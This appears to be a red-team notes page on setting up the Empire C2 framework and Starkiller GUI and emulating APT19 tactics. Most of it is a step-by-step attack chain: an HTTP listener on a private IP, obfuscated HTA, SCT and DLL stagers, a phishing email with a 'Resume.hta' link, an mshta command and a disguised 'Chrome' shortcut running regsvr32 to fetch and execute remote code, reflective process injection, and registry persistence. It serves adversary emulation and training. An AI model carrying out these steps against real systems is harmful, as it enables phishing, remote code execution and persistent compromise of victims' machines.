Empire3
Empire is fully supported by BC-Security
Install on Kali:
sudo apt install powershell-empire
Install on Ubuntu:
cd /opt
sudo git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh
If you are installing the newer version of Empire on the SANS Slingshot C2 Matrix Edition VM, there is a small bug because it wants Ubuntu 20.04 but slingshot is in 18.04. Replace the line in setup/install.sh with the correct version:
And comment the version test:
#if [ $VERSION_ID != "20.04" ]; then # echo -e '\x1b[1;31m[!] Ubuntu must be 20.04\x1b[0m' && exit #fi
Download Starkiller if you want a GUI:
cd /opt
sudo wget https://github.com/BC-SECURITY/Starkiller/releases/download/v1.0.0/starkiller-1.0.0.AppImage
sudo chmod +x starkiller-1.0.0.AppImage
sudo empire
On Kali:
sudo powershell-empire
Run Empire for connectivity through Starkiller if you want a GUI:
sudo empire --rest --username <user> --password <password>
Open Starkiller:
cd /opt/starkiller
./starkiller-1.2.2.AppImage
Login to Starkiller:
- Name: localhost:1337
- Username: <user>
- Password: <password>
Will use an adversary emulation plan for APT19 as an example: https://www.scythe.io/library/threatthursday-apt19
Tactic | Description |
Description | APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. |
Goal and Intent | Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks. |
Command and Control | Commonly Used Port (T1043) - TCP port 80; Standard Application Layer Protocol (T1071) - HTTP; Deobfuscate/Decode Files or Information (T1140); Data Encoding (T1132) - used Base64 to encode communications to the C2 server |
Initial Access | Spearphishing attachment (T1193); Spearphishing link (T1192) |
Execution | PowerShell (T1086); User Execution; Hidden Windows (T1143) - used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden; Obfuscated Files or Information (T1027) - used Base64 to obfuscate commands and the payload; DLL Side-Loading (T1073) |
Discover | System Owner/User Discovery (T1033); System Information Discovery (T1082) System Network Configuration Discovery (T1016) |
Persistence | Registry Run Keys/ Start up Folder (T1060) - establishes persistence by setting the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Debug Tools-%LOCALAPPDATA%\ |
Defense Evasion | Regsvr32 (T1117); Scripting (T1064) - downloaded and launched code within a SCT file to bypass application whitelisting techniques |
Create Listener
Type: http
Name: http
Host: http://10.0.0.187
Port: 80
BindIP: 10.0.0.187
Jitter: 0.5
StagingKey: georgy
Generate Stager HTA:
Type: windows/hta
Listner: http
Base64: True
Language: powershell
Outfile: /tmp/Resume.hta
Generate Stager SCT:
Type: windows/launcher_sct
Listner: http
Base64: True
Language: powershell
Generate Stager DLL:
Type: windows/dll
Listner: http
Arch: x86
Language: powershell
OutFile: /tmp/launcher.dll
Optional Fields
Obfuscate: True
ObfuscateCommand: Token\String\1
Download the stagers to /tmp and serve with SimpleHTTPServer
cd /tmp
python -m SimpleHTTPServer 8080
Email with link to Resume.hta
Show execution of HTA file:
mshta http://10.0.0.187:8080/Resume.hta
Migrate to another process with reflective PE Injection: https://www.bc-security.org/post/reflective-pe-injection-in-windows-10-1909/
See processes running: ps
usemodule code_execution/invoke_reflectivepeinjection
set ProcID: <processID>
set DllPath: /tmp/launcher.dll
whoami
usemodule situational_awareness/host/antivirusproduct
usemodule situational_awareness/host/get_uaclevel
usemodule situational_awareness/host/winenum
usemodule persistence/userland/registry
set Listener: http
Open regedit HKCU\Software\Microsoft\Windows\CurrentVersion
Execution with regsvr32 and scripting. Created a shortcut called Chrome with Target set as:
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\regsvr32.exe /s /n /u /i:http:\10.0.0.187:8080\launcher.sct scrobj.dll"
cd C:\Users\<username>
upload /tmp/file
shell C:\Users\<username>\<executable>
Last modified 2mo ago